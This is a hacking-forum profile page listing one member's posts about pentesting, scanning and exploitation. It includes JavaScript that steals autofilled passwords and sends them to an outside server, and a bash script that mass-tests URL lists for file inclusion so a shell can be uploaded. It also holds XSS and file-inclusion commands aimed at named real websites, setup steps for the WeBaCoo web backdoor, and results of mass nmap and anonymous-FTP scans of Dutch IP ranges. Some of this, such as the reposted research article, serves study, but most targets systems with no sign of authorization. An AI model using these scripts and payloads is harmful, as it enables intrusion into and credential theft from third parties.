Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - neusbeer

Pages: [1] 2
1
Hacking and Security / password AfXNtpa38x
« on: February 11, 2014, 08:02:57 pm »
I was busy pentesting ip cam's. and found a 'strange' thing.
I use noisy scanning with Acunetix (yeah I'm lazy), and it bruteforce about
40 passwords including this one.
Example log of Acunetix scan: [size=78%]http://www.webprocomponents.com/photographer-portfolio-pro/Wildlife-portfolio1-demo/admin/attackers/94.220.67.55.log[/size]
(see the bruteforce part) note, this ain't my log ;)


When testing a ipcam, the actual password of the HTTP Auth was AfXNtpa38x.
Not really a password you see everyday, and when I google it, there aren't many hits. (only a leak pastebin with also the same password in it. http://pastebin.com/2vMgHkYk)

Why does this (dutch) IP cam have this password.


Am I missing something? is this a standard password for IP cam's of this type or somekind of buildin hardcoded password.

2
Reverse Engineering / WinICE problem
« on: May 12, 2012, 09:50:33 am »
Not sure where to put this question.



I installed WinICE, but I wanna deinstall/deactivate it.
how can I do this?


If I start an other program now I get a message that it won't run
because of there's a debugger running.
It's in win xp sp3, where can I get this option to set off?


Deinstalling WinICE won't work, I still got the same message from the other programs.


3
Hacking and Security / Abusing Password Managers with XSS
« on: April 26, 2012, 10:41:52 am »
First off, I didn't test it. but I find it a good article.

Abusing Password Managers with XSS
By Ben Toews

One common and effective mitigation against Cross-Site Scripting (XSS) is to set the HTTPOnly flag on session cookies.
This will generally prevent an attacker from stealing users session cookies with XSS.
There are ways of circumventing this (e.g. the HTTP TRACE method),
but generally speaking, it is fairly effective.
That being said, an attacker can still cause significant damage
without being able to steal the session cookie.

A variety of client-side attacks are possible,
 but an attacker is also often able to circumvent Cross-Site Request Forgery (CSRF) protections
via XSS and thereby submit various forms within the application.
The worst case scenario with this type of attack would be that there is no
confirmation for email address or password changes and the attacker can change usersí passwords.
From an attackerís perspective this is valuable,
but not as valuable as being able to steal a userís session. By reseting the password,
the attacker is giving away his presence and the extent to
which he is able to masquarade as another user is limited.
While stealing the session cookie may be the most commonly cited method for hijacking user accounts,
other means not involving changing user passwords exist.

All modern browsers come with some functionality to remember user passwords.
Additionally, users will often install third-party applications to manage their passwords for them.
All of these solutions save time for the user and generally help to prevent forgotten passwords.
Third party password managers such as LastPass are also capable of generating strong,
application specific passwords for users and then sending them off to the cloud for storage.
Functionality such as this greatly improves the overall security of the username/password authentication model.
By encouraging and facilitating the use of strong application specific passwords,
users need not be as concerned with unreliable web applications that inadequately protect their data.
For these and other reasons, password managers such as LastPass are generally
considered within the security industry to be a good idea.
I am a long time user of LastPass and have (almost) nothing but praise for their service.

An issue with both in-browser as well as third-party password managers that gets hardly
any attention is how these can be abused by XSS.
Because many of these password managers automatically fill login forms,
an attacker can use JavaScript to read the contents of the form once it has been filled.
The lack of attention this topic receives made me curious to see how exploitable it actually would be.
For the purpose of testing, I built a simple PHP application with a functional
login page aswell as a second page that is vulnerable to XSS (find them here).
I then proceded to experiment with different JavaScript, attempting to steal user
credentials with XSS from the following password managers:

LastPass (Current version as of April 2012)
Chrome (version 17)
Firefox (version 11)
Internet Explorer (version 9)
I first visited my login page and entered my password.
If the password manager asked me if I wanted it to be remembered, I said yes.
I then went to the XSS vulnerable page in my application and experimented with different JavaScript,
attempting to access the credentials stored by the browser or password manager.
I ended up writing some JavaScript that was effective against the password managers listed above with the exception of IE:

Code: [Select]
<script type="text/javascript">// <![CDATA[
    ex_username = '';
    ex_password = '';
    inter = '';
    function attack(){
        ex_username = document.getElementById('username').value;
        ex_password = document.getElementById('password').value;
        if(ex_username != '' | ex_password != ''){
            document.getElementById('xss').style.display = 'none'
            request=new XMLHttpRequest();
            url = "http://btoe.ws/pwxss?username="+ex_username+"&password="+ex_password;
            request.open("GET",url,true);
            request.send();
            document.getElementById('xss').style.visibility='hidden';
            window.clearInterval(inter);
        }
    }
    document.write("\
 
<div id='xss'>\


<form method='post' action='index.php'>\
    username:<input type='text' name='username' id='username' value='' autocomplete='on'>
\
    password:<input type='password' name='password' id='password' value='' autocomplete='on'>
\
    <input type='submit' name='login' value='Log In'>\
    </form>
 
\<>
 
\
    ");
    inter = window.setInterval("attack()",100);
// ]]></script>
All that this code does it create a fake login form on the XSS vulnerable page and then wait for it to be filled in by the browser or password manager. When the fields are filled, the JavaScript takes the values and sends them off to another server via a simple Ajax request. At first I had attempted to harness the onchange event of the form fields, but it turns out that this is unreliable across browsers (also, LastPass seems to mangle the form and input field DOM elements for whatever reason).
Using window.setInterval, while less elegant, is more effective.
If you want to try out the above code,
go to http://boomer.neohapsis.com/pwxss and login (username:user1 password:secret).
Then go to the reflections page and enter the slightly modified code listed there into the text box.
If you told your password manager to remember the password for the site, you should see an alert 
box with the credentials you previously entered.
Please let me know if you find any vulns aside from XSS in this app.

To be honest, I was rather surprised that my simple trick worked in Chrome and Firefox.
The LastPass plugin in the Chrome browser operates on the DOM level like any other Chrome plugin,
meaning that it canít bypass event listeners that are watching for form submissions.
The browsers, on the other hand could put garbage into the form elements in the DOM and wait until
after the onsubmit event has fired to put the real credentials into the form.
This might break some web applications that take action based on the onchange event of the form inputs,
but if that is a concern, I am sure that the browsers could somehow fill the form fields without triggering this event.

The reason why this code doesnít work in IE (aside from the non-IE-friendly XHR request)
is that the IE password manager doesnít automatically fill in user credentials.
IE also seems to be the only one of the bunch that ties a set of credentials to a specific page
rather than to an entire domain. While these both may be inconveniences from a usability perspective,
they (inadvertantly or otherwise) improve the security of the password manager.

While this is an attack vector that doesnít get much attention, I think that it should.
XSS is a common problem, and developers get an unrealistic sense of security from the HTTPOnly cookie flag.
This flag is largely effective in preventing session hijacking, but user credentials may still be at risk.
While I didnít get a chance to check them out when researching this,
I would not be surprised if Opera and Safari had the same types of behavior.

I would be interested to hear a discussion of possible mitigations for this vulnerability.
If you are a browser or browser-plugin developer or just an ordinary hacker,
leave a comment and let me know what you think.

http://labs.neohapsis.com/2012/04/25/abusing-password-managers-with-xss/

4
Hacking and Security / ColdFusion (cmf) exploiting ?
« on: February 10, 2012, 01:51:29 pm »
ey,


got a site which runs on coldfusion.
acunetix gave me some basic vulns.
but this one is new for me..
anyone some info about coldfusion and the possibilities* ?


*for exploiting ofcourse ;-)


I have gathered:
a sql error: http://www.menninks.nl:80/index.cfm?itm_id=1e309
is injection possible?


weak password: http://www.menninks.nl:80/index.cfm?fuseaction=cms.auth
pwd=cisco&usr=Administrator

But gives me an error page (with neat info but what to do with it?)
and login doesn't work.


also Bonjour service is running. not sure what this is. and if this is exploitable.




ow last thing.. mysql 5.1.49-1ubuntu8.1 running
I read this week that there's a 0day exploit for this made by Canvas in their
private exploit packs (Which is expensive) is there a script/exploit for free somewhere?

5
Scripting languages / bash script find and replace (problem)
« on: February 09, 2012, 05:27:41 pm »
ok, I have a list with hash:pass
and I want to replace it on a document.
(Html in this case).


I made this script:
Code: [Select]
#!/bin/bash
# $1 file with search:replace list
# $2 files to check


# read s&r list


lijst=( `cat "$1" `)


for t in "${lijst[@]}"
do
 hash=$(echo $t | cut -d\: -f1)
 pass=$(echo $t | cut -d\: -f2)
 sed -i 's/"$hash"/"$pass"/g' "$2"
done


but this takes forrrreeevvveerrr.. :-)


any ideas on this?


addition: It doesn't even work correct  :o

6
Hacking and Security / ClubHack Magazine's Issue-25, Feb 2012
« on: February 08, 2012, 05:25:45 pm »

ClubHack Magazine's Issue-25, Feb 2012 is released. The theme for this issue is Network Exploitation and Security.


This issue covers following articles:-


0x00 Tech Gyan - Exploiting Remote System without Being Online
0x01 Tool Gyan - Cain and Abel: The Black Art of ARP Poisoning
0x02 Mom's Guide - Firewall 101
0x03 Legal Gyan - Liability of Intermediaries under the Information Technology Act
0x04 Matriux Vibhag - Introduction to Skipfish
0x05 Poster - "Secured Network"


Check http://chmag.in/ for articles.
PDF version can be download from:- http://chmag.in/issue/feb2012.pdf


CHMag is seeking articles for next issue. Topics:-
1. Web App Sec
2. OS Exploitation and Security
3. Cryptography and cryptanalysis


Send us your feedback, articles at info@chmag.in


Regards,
Abhijeet Patil,
Co-Founder, CHMag
http://chmag.in


Code: [Select]
wget http://chmag.in/issue/feb2012.pdf

every month they have a magazine about hacking/pentesting.
I think it's one of the best *free* magazines.


7
Security Tools / Vega
« on: February 03, 2012, 07:24:09 pm »

http://subgraph.com/vega_download.html


ABOUT VEGA
Vega is an open source platform to test the security of web applications.
Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS),
inadvertently disclosed sensitive information, and other vulnerabilities.
It is written in Java, GUI based, and runs on Linux, OS X, and Windows.


Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection.
Vega can be extended using a powerful API in the language of the web: Javascript.


Vega was developed by Subgraph in Montreal.


CORE
Automated Crawler and Vulnerability Scanner
Consistent UI
Website Crawler
Intercepting Proxy
SSL MITM
Content Analysis
Extensibility through a Powerful Javascript Module API
Customizable alerts
Database and Shared Data Model

8
Hacking and Security / LFI exploit running in the wild
« on: January 27, 2012, 09:19:35 am »
There's a 'new' lfi attack being used a lot at this moment.
read this article http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html
in's a lfi with standard /etc/passwd inclusion, and right after that a check
for /proc/self/eviron
I never heard of this 'link'.. what is it?  I know it's from linux.. is it the
running account info on the server?
anyways it allows the use of a shell ;-)


I made a script to check the exploit on a url list.
input a list with /etc/passwd in the url (example list)
and results in a logfile with /proc/self/eviron possible.
(after that tampering user-agent to get your shell up there :-))
Code: [Select]
#!/bin/bash
cat "$1" | while read url ; do
 test=$(curl "$url" | grep -i "root")
 if [ -z "$test" ]; then
   echo "No LFI in $url"
  else
   echo "LFI found in $url"
   echo "$url" >> output.log
  fi
done
cat output.log | sed 's/\/etc\/passwd/\/proc\/self\/environ/g' | while read url1 ; do
  test=$(curl "$url1" | grep -i "document_root")
  if [ -z "$test" ]; then
    echo "No /proc/self/environ in $url1"
  else
   echo "/proc/self/environ found in $url1"
   echo "$url1" >> final_list.log
  fi
done

9
Security Tools / FuzzDB
« on: January 22, 2012, 12:47:20 am »
FuzzDB

Attack and Discovery Pattern Database for Application Fuzz Testing

Code: [Select]
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only

I overlooked this database. but it seems quite good.
It's and database with all kinds of data.
for example: webshell oneliners, standard file fuzz lists,
path traversal strings, sqli strings, buffer overflow strings
and other usefull payloads.

Quote
What's in fuzzdb?
Predictable Resource Locations - Because of the popularity of a small number of server types, platforms, and package formats, resources such as logfiles and administrative directories are typically located in a small number of predictable locations. FuzzDB contains a comprehensive database of these, sorted by platform type, language, and application, making brute force testing less brutish.

Attack Patterns - Categorized by platform, language, and attack type, malicious and malformed inputs known to cause information leakage and exploitation have been collected into sets of test cases. FuzzDB contains comprehensive lists of attack payloads known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, http header crlf injections, and more.

Response Analysis - Since system responses also contain predictable strings, fuzzdb contains a set of regex pattern dictionaries such as interesting error messages to aid detection software security defects, lists of common Session ID cookie names, and more.

Other useful stuff - Webshells, common password and username lists, and some handy wordlists.

Documentation - Helpful documentation and cheatsheets sourced from around the web that are relevant to the payload categories are also provided.

10
Hacking and Security / FTP scan -stats-
« on: January 19, 2012, 11:16:52 pm »
FTP scan -STATS-

For those who is interested in my stats
and findings after a nice big scan of FTP

I scanned in groups of 50000 Dutch IPs with NMap.
I used -T5 to speed up the things so he can missed some
ftp servers with slow response.

scan command/the script I used
Code: [Select]
#!/bin/bash
# $1 : infile (without .txt) output is infile + _p21.gnmap/nmap/xml
sudo nmap -v -iL "$1".txt -Pn -T5 -sV --version-all -n -p 21 -oA ~/workingdir/output/p21/"$1"_p21 --script=ftp-anon,banner,ftp-proftpd-backdoor,ftp-vsftpd-backdoor --open -sS

I scanned for this 105 ip lists of 5000 gives me a total op 5.250.000 IP's
(still busy, 45 to go)

Not 1 time I got a hit from the 2 scripts of nmap which checks for a backdoored FTP version

so
num ip's                          : 5.250.000 (list)
uniq IP's w/o port 21      :    41.412 (list)
   Top 5 ip groups (list)
     6963  145.216
     3442  145.217
     1642    83.162
     1194  212.204
       996    86.109
backdoored                    : 0
Found Service Info         : 142 *not much(-T5 is fastscan with not enough waiting time)
   Top 5   
      85 Service Info: OS: Unix
      27 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
        4 Service Info: Device: firewall
        3 Service Info: Device: broadband router
        2 Service Info: OS: VxWorks; CPE: cpe:/o:windriver:vxworks
     
FTP anonymous access      : 1765* succesfully logins with user:anonymous pass:anon@
     
also the scan did a banner grab (short one because of the T5 option of NMap)
Banner grabbed            : 20457 (almost 50% of the open ports found) (link)
   Return codes top 3
    20190 220
          62 530
          46 550
     
   ProFTPD                      :  5308 (1/4 of all the banners)
   Top 5 versions
      621 ProFTPD 1.3.1 Server
      368 ProFTPD 1.3.3c Server
      355 ProFTPD 1.3.2e Server
      240 ProFTPD 1.3.3e Server
      141 ProFTPD 1.3.3a Server
   vsFTPD                        : 1653
   Top 5 versions
     907 (vsFTPd 2.0.5)
     205 (vsFTPd 2.0.7)
     122 (vsFTPd 2.3.2)
     119 (vsFTPd 2.2.2)
       68 (vsFTPd 2.0.1)
   FileZilla                      :  710
   Top 5 versions
     168 FileZilla Server version 0.9.37 beta
     142 FileZilla Server version 0.9.39 beta
       83 FileZilla Server version 0.9.40 beta
       72 FileZilla Server version 0.9.34 beta
       41 FileZilla Server version 0.9.33 beta
   VxWorks                  :  99
   Top 5 versions
      69 VxWorks (VxWorks5.4.2) FTP server ready
      17 Tornado-vxWorks (VxWorks5.4.2) FTP server ready
        9 VxWorks (5.4.2) FTP server ready
        2 VxWorks (VxWorks5.5.1) FTP server ready
        1 VxWorks FTP server (VxWorks 5.4.2) ready.
   NASFTP               : 359
     Turbo                : 350
        277 Turbo station 2.x 1.3.2e Server
          73 Turbo station 2.x 1.3.1rc2 Server
      3.x Server                 :   9
   Serv-U                  : 139
   Top 5 versions
        29   v6.4
        16   v6.0
        14 v11.1
        11   v6.2
          8   v6.3
     
   FTP Server ready.      : 2469


some other statics
   NAS found                    :  615
   Microsoft FTP Service   : 1805
   FritzBox            :   86
   'welcome' in banner      : 3116
   'ready' in banner              :   8792
   service not available        :   33
   Cisco                                :   23
   P2612HW                         :   62 *ZyXEL Router
   camera's                          :   47 *39 AXIS
   DreamBox                        :   197
   Moxa FTP                          :   13
   DSL Router                       :   30
   DiskStation                      :   255
   Check Point Firewall:       :      119
   TCAdmin                          :   40
   Winsock ready...              :   93
   Gene6                              :   54
   spftp                                :   38
   ucftpd                               :   20
   FTP-Uploadserver             :   61
   WAR-FTPD                        :    7
   BulletProof   FTP               :   27
   Titan FTP                          :   14
   zFTPServer                       :   20
   Cerberus                          :   22
   Rumpus                           :   37
   JD FTP                             :   33
   Card AOS                        :   68
   pd-admin                        :    6
   Welcome to
      the CS network              :   25  ? so many
   Netwerkschijf                 :   7 *dutch for "disk drive"
   Inactivity timer text                 :   72
   Connection refused,
      unknown IP address           :   59
   IP in banner                   : 3859
   
   
Why I make stats?
can be handy with pentesting!
For example knowning that the word 'welcome' isn't often used (+/- 25%)
and 'ready' not reaching 50% that a scanner based on return strings
isn't the best idea.
Or if you see the versions of the mainly used ftp servers don't have the latest
version. 1.3.1. for ProFTPD and 2.0.5 for vsFTPd. and googling around brings
a lot of exploits based on this versions.
Serv-U 6.4 is most used, and a lot of exploits are on the net.
(Dir traversal, BoF's, Auth. bypass).


11
Hacking and Security / packetstormsecurity.org closed for today
« on: January 18, 2012, 06:39:15 am »
First one that shut down today.....
(Glad I have all their exploits on my hdd  ;D )





12
Hacking and Security / xss scripting problem
« on: January 14, 2012, 11:55:13 am »
I'm kinda stuck here..
There's a new exploit
http://www.exploit-db.com/exploits/18355/

have a target:
http://www.unrequited-love.com/

the xss with the picture loading as the examples shows works.
Code: [Select]
http://www.unrequited-love.com/blog/wp-content/plugins/count-per-day/map/map.php?map='%22));%20%3C/script%3E%3Cimg%20src=http://www.bing.com//az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg%3E'this brings a nice picture of a whale.

But I want to inject php or js script. How can I manage that?
I've tried everything..  :o
I like to add
Quote
<?php passthru($_POST['cat /etc/passwd']); __halt_compiler();
or similar, or c99 (or other shell) or netcat command. anything..
except a picture .. *sigh*



the local file inclusion works as a charm (Note: A lot deleted download.php)
Code: [Select]
curl "http://www.armandocruz.com/wp-content/plugins/count-per-day/download.php?n=1&f=../../../../../../etc/passwd"gives the data of /etc/passwd (but has shadow.. so useless :P)

13
Scripting languages / bash pipe problem
« on: January 13, 2012, 05:35:51 pm »
(not sure if this is the right place to ask)


I have a small problem with pipe in linux.


case:
if have a script wich output for me a IP adres and I want to pipe it to whatweb.


script is a simple way to output ip from a domain.
so I tried


getip domain.com | whatweb


but whatweb doesn't get the IP which is given bij script 'getip'.
do I need to put a variable after whatweb
like - or "$1" or something.
Kinda stuck here,...

14
Security Tools / WeBaCoo
« on: January 11, 2012, 08:26:17 pm »
Web Backdoor Cookie Script-Kit

Get your fresly made script to server and call to it from your bash.
Result: Nice bash shell wich communicates through cookie.
*site must have cookies enabled.

Install:
git clone git://github.com/anestisb/WeBaCoo.git
or
wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

$ ./webacoo.pl -h WeBaCoo 0.2 - Web Backdoor Cookie Script-Kit Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

Usage: webacoo.pl [options]

Options:
 -g            Generate backdoor code (-o is required)
 -f FUNCTION   PHP System function to use FUNCTION
1: system       (default)
2: shell_exec
3: exec
4: passthru
5: popen

-o OUTPUT     Generated backdoor output filename
-r            Return un-obfuscated backdoor code
-t            Establish remote "terminal" connection (-u is required)
-u URL        Backdoor URL
-c C_NAME     Cookie name (default: "M-cookie")
-d DELIM      Delimiter (default: New random for each request)
-a AGENT      HTTP header user-agent (default exist)

-p PROXY      Use proxy (tor, ip:port or user:pass:ip:port)

-v LEVEL      Verbose level LEVEL 0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data

-h            Display help and exit update        Check for updates and apply if any

So create shell:
./webacoo.pl -g -f 5 -o shell_popen.php -c 'cookie named which site uses'

get that thing on their server and run:

./webacoo.pl -t -u http://site/link_to/shell_popen.php

Ofcouse their are other ways. But this one fits my needs sometimes.
(last night I didn't had a server with netcat installed).

15
Security Tools / scritch.org
« on: January 11, 2012, 08:18:30 pm »
CMS identification and other html identification tools.
I use this as a bookmark in my browser.


Make a bookmark,
text: CMS
URL: javascript:(function(){window.open('http://guess.scritch.org/?url='+encodeURIComponent(document.location),'Guess')})()


When I want to fast detect the cms or php version I use this.


example output:



Pages: [1] 2


Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Bluechill or Kulverstukas on the forum or at IRC.